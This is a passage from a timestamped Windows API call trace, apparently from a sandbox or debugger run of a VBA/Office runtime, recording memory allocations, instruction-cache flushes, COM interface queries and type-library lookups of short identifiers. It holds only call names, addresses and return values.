0xffffffffffffffff [0045.351] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89d9, dwSize=0x8) returned 1 [0045.351] GetCurrentProcess () returned 0xffffffffffffffff [0045.351] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89d8, dwSize=0x8) returned 1 [0045.351] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89d9, dwSize=0x8) returned 1 [0045.351] GetCurrentProcess () returned 0xffffffffffffffff [0045.351] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89d8, dwSize=0x8) returned 1 [0045.351] GetCurrentProcess () returned 0xffffffffffffffff [0045.351] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d89e8, dwSize=0x2) returned 1 [0045.351] GetCurrentProcess () returned 0xffffffffffffffff [0045.351] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d8a3c, dwSize=0x45) returned 1 [0045.351] VirtualProtect (in: lpAddress=0x81d8a3c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x204c8c | out: lpflOldProtect=0x204c8c*=0x40) returned 1 [0045.351] IUnknown:AddRef (This=0x7f72450) returned 0x7 [0045.351] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206048 | out: ppvObject=0x206048*=0x0) returned 0x80004002 [0045.352] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206040 | out: ppvObject=0x206040*=0x0) returned 0x80004002 [0045.352] IUnknown:Release (This=0x7f72450) returned 0x6 [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8005550 [0045.352] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18430 [0045.352] GetCurrentProcess () returned 0xffffffffffffffff [0045.352] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x11) returned 0x8005550 [0045.352] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18610 [0045.352] GetCurrentProcess () returned 0xffffffffffffffff [0045.352] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8005550 [0045.352] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18670 [0045.352] GetCurrentProcess () returned 0xffffffffffffffff [0045.352] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8005550 [0045.352] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f186d0 [0045.352] GetCurrentProcess () returned 0xffffffffffffffff [0045.352] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8005550 [0045.352] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18730 [0045.352] GetCurrentProcess () returned 0xffffffffffffffff [0045.352] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x11) returned 0x8005550 [0045.352] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18790 [0045.352] GetCurrentProcess () returned 0xffffffffffffffff [0045.352] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x11) returned 0x8005550 [0045.352] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.352] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f187f0 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0045.353] IMalloc:Alloc (This=0x7feff045380, cb=0x12) returned 0x8005550 [0045.353] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.353] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18850 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0045.353] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x8005550 [0045.353] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.353] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f188b0 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0045.353] IMalloc:Alloc (This=0x7feff045380, cb=0x11) returned 0x8005550 [0045.353] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.353] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18910 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0045.353] IMalloc:Alloc (This=0x7feff045380, cb=0x11) returned 0x8005550 [0045.353] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.353] IMalloc:Alloc (This=0x7feff045380, cb=0x58) returned 0x7f18970 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.353] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0045.353] GetCurrentProcess () returned 0xffffffffffffffff [0045.354] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0045.354] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0045.354] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205f68 | out: ppvObject=0x205f68*=0x0) returned 0x80004002 [0045.354] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205f60 | out: ppvObject=0x205f60*=0x0) returned 0x80004002 [0045.354] IUnknown:Release (This=0x7f72500) returned 0x2 [0045.354] IMalloc:Realloc (This=0x7feff045380, pv=0x81f6530, cb=0x1000) returned 0x8142e00 [0045.354] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba4c60 [0045.354] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x30) returned 0x7d55c50 [0045.354] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b00000 [0045.355] _mbscpy_s (in: _Dst=0x204d70, _DstSizeInBytes=0x4, _Src=0x30d2e2a | out: _Dst=0x204d70) returned 0x0 [0045.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e4e, cbMultiByte=4, lpWideCharStr=0x204950, cchWideChar=5 | out: lpWideCharStr="tyu") returned 4 [0045.355] ITypeComp:RemoteBind (in: This=0x7edf750, szName="tyu", lHashVal=0x10db18, wFlags=0x3, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e4e, cbMultiByte=4, lpWideCharStr=0x204950, cchWideChar=5 | out: lpWideCharStr="tyu") returned 4 [0045.355] ITypeComp:RemoteBind (in: This=0x3dd7b90, szName="tyu", lHashVal=0x10db18, wFlags=0x3, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e4e, cbMultiByte=4, lpWideCharStr=0x204950, cchWideChar=5 | out: lpWideCharStr="tyu") returned 4 [0045.355] ITypeComp:RemoteBind (in: This=0x7ee0560, szName="tyu", lHashVal=0x10db18, wFlags=0x3, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.355] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tyu") returned 0x10db18 [0045.355] strcpy_s (in: _Dst=0x2048b0, _DstSize=0x4, _Src="tyu" | out: _Dst="tyu") returned 0x0 [0045.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2048b0, cbMultiByte=4, lpWideCharStr=0x204700, cchWideChar=4 | out: lpWideCharStr="tyu") returned 4 [0045.355] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.355] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="tyu", lHashVal=0x10db18, pfName=0x2047d0, pBstrLibName=0x204700 | out: pfName=0x2047d0*=0, pBstrLibName=0x204700) returned 0x0 [0045.355] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.355] IUnknown:AddRef (This=0x3dd7b80) returned 0x14 [0045.355] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="tyu", lHashVal=0x10db18, pfName=0x2047d0, pBstrLibName=0x204700 | out: pfName=0x2047d0*=0, pBstrLibName=0x204700) returned 0x0 [0045.355] IUnknown:Release (This=0x3dd7b80) returned 0x13 [0045.355] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.355] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="tyu", lHashVal=0x10db18, pfName=0x2047d0, pBstrLibName=0x204700 | out: pfName=0x2047d0*=0, pBstrLibName=0x204700) returned 0x0 [0045.355] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.355] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.355] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="tyu", lHashVal=0x10db18, pfName=0x2047d0, pBstrLibName=0x204700 | out: pfName=0x2047d0*=0, pBstrLibName=0x204700) returned 0x0 [0045.355] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e4e, cbMultiByte=4, lpWideCharStr=0x204950, cchWideChar=5 | out: lpWideCharStr="tyu") returned 4 [0045.356] ITypeComp:RemoteBind (in: This=0x7edffc0, szName="tyu", lHashVal=0x10db18, wFlags=0x3, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.356] IMalloc:Realloc (This=0x7feff045380, pv=0x810a1a0, cb=0x200) returned 0x8061d00 [0045.356] IMalloc:Alloc (This=0x7feff045380, cb=0xb) returned 0x8005550 [0045.356] _mbscpy_s (in: _Dst=0x8005550, _DstSizeInBytes=0x4, _Src=0x30d2e4e | out: _Dst=0x8005550) returned 0x0 [0045.356] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tyu") returned 0x109829 [0045.356] strcpy_s (in: _Dst=0x204a60, _DstSize=0xb, _Src="_B_var_tyu" | out: _Dst="_B_var_tyu") returned 0x0 [0045.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x204a60, cbMultiByte=11, lpWideCharStr=0x2048b0, cchWideChar=11 | out: lpWideCharStr="_B_var_tyu") returned 11 [0045.356] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.356] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_B_var_tyu", lHashVal=0x109829, pfName=0x204980, pBstrLibName=0x2048b0 | out: pfName=0x204980*=0, pBstrLibName=0x2048b0) returned 0x0 [0045.356] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.356] IUnknown:AddRef (This=0x3dd7b80) returned 0x14 [0045.356] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="_B_var_tyu", lHashVal=0x109829, pfName=0x204980, pBstrLibName=0x2048b0 | out: pfName=0x204980*=0, pBstrLibName=0x2048b0) returned 0x0 [0045.356] IUnknown:Release (This=0x3dd7b80) returned 0x13 [0045.356] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.356] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="_B_var_tyu", lHashVal=0x109829, pfName=0x204980, pBstrLibName=0x2048b0 | out: pfName=0x204980*=0, pBstrLibName=0x2048b0) returned 0x0 [0045.356] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.356] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.356] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="_B_var_tyu", lHashVal=0x109829, pfName=0x204980, pBstrLibName=0x2048b0 | out: pfName=0x204980*=0, pBstrLibName=0x2048b0) returned 0x0 [0045.356] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.356] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.356] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f042a, cbMultiByte=11, lpWideCharStr=0x204910, cchWideChar=12 | out: lpWideCharStr="_B_var_tyu") returned 11 [0045.356] ITypeComp:RemoteBind (in: This=0x7edf750, szName="_B_var_tyu", lHashVal=0x109829, wFlags=0x3, ppTInfo=0x2048c8, pDescKind=0x2048dc, ppFuncDesc=0x2048e0, ppVarDesc=0x74005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2048c8*=0x0, pDescKind=0x2048dc*=0, ppFuncDesc=0x2048e0, ppVarDesc=0x74005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.356] _mbscpy_s (in: _Dst=0x204ad0, _DstSizeInBytes=0x4, _Src=0x30d2e4e | out: _Dst=0x204ad0) returned 0x0 [0045.356] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e72, cbMultiByte=4, lpWideCharStr=0x204950, cchWideChar=5 | out: lpWideCharStr="why") returned 4 [0045.357] ITypeComp:RemoteBind (in: This=0x7edf750, szName="why", lHashVal=0x10e3e9, wFlags=0x5, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e72, cbMultiByte=4, lpWideCharStr=0x204950, cchWideChar=5 | out: lpWideCharStr="why") returned 4 [0045.357] ITypeComp:RemoteBind (in: This=0x3dd7b90, szName="why", lHashVal=0x10e3e9, wFlags=0x5, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e72, cbMultiByte=4, lpWideCharStr=0x204950, cchWideChar=5 | out: lpWideCharStr="why") returned 4 [0045.357] ITypeComp:RemoteBind (in: This=0x7ee0560, szName="why", lHashVal=0x10e3e9, wFlags=0x5, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.357] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="why") returned 0x10e3e9 [0045.357] strcpy_s (in: _Dst=0x2048b0, _DstSize=0x4, _Src="why" | out: _Dst="why") returned 0x0 [0045.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2048b0, cbMultiByte=4, lpWideCharStr=0x204700, cchWideChar=4 | out: lpWideCharStr="why") returned 4 [0045.357] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.357] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="why", lHashVal=0x10e3e9, pfName=0x2047d0, pBstrLibName=0x204700 | out: pfName=0x2047d0*=0, pBstrLibName=0x204700) returned 0x0 [0045.357] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.357] IUnknown:AddRef (This=0x3dd7b80) returned 0x14 [0045.357] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="why", lHashVal=0x10e3e9, pfName=0x2047d0, pBstrLibName=0x204700 | out: pfName=0x2047d0*=0, pBstrLibName=0x204700) returned 0x0 [0045.357] IUnknown:Release (This=0x3dd7b80) returned 0x13 [0045.357] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.357] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="why", lHashVal=0x10e3e9, pfName=0x2047d0, pBstrLibName=0x204700 | out: pfName=0x2047d0*=0, pBstrLibName=0x204700) returned 0x0 [0045.357] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.357] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.357] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="why", lHashVal=0x10e3e9, pfName=0x2047d0, pBstrLibName=0x204700 | out: pfName=0x2047d0*=0, pBstrLibName=0x204700) returned 0x0 [0045.357] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2e72, cbMultiByte=4, lpWideCharStr=0x204950, cchWideChar=5 | out: lpWideCharStr="why") returned 4 [0045.357] ITypeComp:RemoteBind (in: This=0x7edffc0, szName="why", lHashVal=0x10e3e9, wFlags=0x5, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.357] IMalloc:Alloc (This=0x7feff045380, cb=0xb) returned 0x8005550 [0045.357] _mbscpy_s (in: _Dst=0x8005550, _DstSizeInBytes=0x4, _Src=0x30d2e72 | out: _Dst=0x8005550) returned 0x0 [0045.357] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_why") returned 0x10a0fa [0045.357] strcpy_s (in: _Dst=0x204a60, _DstSize=0xb, _Src="_B_var_why" | out: _Dst="_B_var_why") returned 0x0 [0045.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x204a60, cbMultiByte=11, lpWideCharStr=0x2048b0, cchWideChar=11 | out: lpWideCharStr="_B_var_why") returned 11 [0045.357] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.357] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_B_var_why", lHashVal=0x10a0fa, pfName=0x204980, pBstrLibName=0x2048b0 | out: pfName=0x204980*=0, pBstrLibName=0x2048b0) returned 0x0 [0045.357] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.357] IUnknown:AddRef (This=0x3dd7b80) returned 0x14 [0045.358] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="_B_var_why", lHashVal=0x10a0fa, pfName=0x204980, pBstrLibName=0x2048b0 | out: pfName=0x204980*=0, pBstrLibName=0x2048b0) returned 0x0 [0045.358] IUnknown:Release (This=0x3dd7b80) returned 0x13 [0045.358] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.358] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="_B_var_why", lHashVal=0x10a0fa, pfName=0x204980, pBstrLibName=0x2048b0 | out: pfName=0x204980*=0, pBstrLibName=0x2048b0) returned 0x0 [0045.358] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.358] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.358] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="_B_var_why", lHashVal=0x10a0fa, pfName=0x204980, pBstrLibName=0x2048b0 | out: pfName=0x204980*=0, pBstrLibName=0x2048b0) returned 0x0 [0045.358] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.358] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.358] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0456, cbMultiByte=11, lpWideCharStr=0x204910, cchWideChar=12 | out: lpWideCharStr="_B_var_why") returned 11 [0045.358] ITypeComp:RemoteBind (in: This=0x7edf750, szName="_B_var_why", lHashVal=0x10a0fa, wFlags=0x5, ppTInfo=0x2048c8, pDescKind=0x2048dc, ppFuncDesc=0x2048e0, ppVarDesc=0x77005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x2048c8*=0x0, pDescKind=0x2048dc*=0, ppFuncDesc=0x2048e0, ppVarDesc=0x77005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.358] _mbscpy_s (in: _Dst=0x204ad0, _DstSizeInBytes=0x4, _Src=0x30d2e72 | out: _Dst=0x204ad0) returned 0x0 [0045.358] IMalloc:Free (This=0x7feff045380, pv=0x8005550) [0045.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x81f7248, cbMultiByte=4, lpWideCharStr=0x3b0086c, cchWideChar=10 | out: lpWideCharStr="Wrst") returned 4 [0045.358] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x200) returned 0x8061f10 [0045.358] IMalloc:Realloc (This=0x7feff045380, pv=0x8061d00, cb=0x400) returned 0x3ea42f0 [0045.358] IMalloc:Alloc (This=0x7feff045380, cb=0x318) returned 0x7e14e60 [0045.358] IMalloc:Realloc (This=0x7feff045380, pv=0x7ba4c60, cb=0x10c) returned 0x8143e40 [0045.358] IMalloc:Free (This=0x7feff045380, pv=0x7f18670) [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d94e8, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d95a0, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9b68, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9c28, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81d9ce8, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813aee8, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813afb0, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b148, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b218, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b390, dwSize=0x8) returned 1 [0045.359] GetCurrentProcess () returned 0xffffffffffffffff [0045.359] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x813b458, dwSize=0x8) returned 1 [0045.359] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0045.359] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ee8 | out: ppvObject=0x205ee8*=0x0) returned 0x80004002 [0045.359] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x205ee0 | out: ppvObject=0x205ee0*=0x0) returned 0x80004002 [0045.359] IUnknown:Release (This=0x7f72500) returned 0x2 [0045.640] VarBstrCmp (bstrLeft="Wrst", bstrRight="Wrst", lcid=0x0, dwFlags=0x30001) returned 0x1 [0045.640] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba4c60 